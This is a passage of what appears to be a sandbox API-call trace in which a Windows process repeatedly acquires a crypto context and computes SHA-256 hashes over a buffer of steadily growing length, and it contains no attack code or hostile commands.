(hHash=0x72b510) returned 1 [0119.712] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.713] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.713] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.713] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x720, dwFlags=0x0) returned 1 [0119.713] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.713] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.713] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.714] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.714] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x740, dwFlags=0x0) returned 1 [0119.714] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.714] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.714] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.714] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.714] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x760, dwFlags=0x0) returned 1 [0119.714] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.714] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.714] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.715] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.715] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x780, dwFlags=0x0) returned 1 [0119.715] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.715] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.715] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.716] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.716] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0119.716] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.716] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.716] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.716] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.716] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0119.716] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.716] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.716] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.717] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.717] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0119.717] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.717] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.717] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.717] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.717] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x800, dwFlags=0x0) returned 1 [0119.718] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.718] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.718] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.718] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.718] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x820, dwFlags=0x0) returned 1 [0119.718] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.718] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.718] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.719] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.719] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x840, dwFlags=0x0) returned 1 [0119.719] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.719] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.719] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.719] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.719] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x860, dwFlags=0x0) returned 1 [0119.719] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.719] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.719] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.720] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.720] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x880, dwFlags=0x0) returned 1 [0119.720] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.720] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.720] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.721] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.721] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0119.721] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.721] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.721] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.721] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.721] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0119.721] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.721] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.721] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.722] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.722] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0119.722] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.722] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.722] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.723] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.723] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x900, dwFlags=0x0) returned 1 [0119.723] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.723] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.723] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.723] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.723] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x920, dwFlags=0x0) returned 1 [0119.723] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.723] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.723] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.724] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.724] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x940, dwFlags=0x0) returned 1 [0119.724] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.724] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.724] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.724] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.724] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x960, dwFlags=0x0) returned 1 [0119.725] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.725] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.725] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.725] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.725] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x980, dwFlags=0x0) returned 1 [0119.725] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.725] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.725] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.726] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.726] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0119.726] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.726] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.726] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.726] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.726] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0119.726] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.726] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.727] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.727] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.727] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0119.727] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.727] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.727] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.728] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.728] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0119.728] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.728] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.728] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.728] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.728] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0119.728] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.728] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.728] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.729] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.729] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0119.729] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.729] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.729] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.729] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.729] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0119.729] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.730] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.730] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.730] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.730] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0119.730] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.730] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.730] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.731] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.731] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0119.731] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.731] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.731] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.731] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.731] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0119.731] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.731] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.731] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.732] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.732] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0119.732] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.732] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.732] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.733] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.733] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0119.733] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.733] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.733] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.733] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.733] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0119.733] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.733] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.733] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.734] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.734] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0119.734] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.734] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.734] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.734] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.735] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0119.735] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.735] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.735] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.735] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.735] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0119.735] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.735] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.735] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.736] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.736] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0119.736] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.736] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.736] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.736] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.736] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0119.736] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.736] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.736] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.737] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.737] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0119.737] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.737] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.737] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.738] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.738] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0119.738] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.738] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.738] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.738] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.738] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0119.738] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.738] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.738] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.739] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.739] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0119.739] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.739] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.739] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.739] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.739] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0119.739] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.740] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.740] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.740] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.740] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0119.740] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.740] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.740] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.741] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.741] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0119.741] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.741] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.741] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.742] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.742] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0119.742] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.742] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.742] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.743] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.743] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0119.743] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.743] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.743] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.743] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, 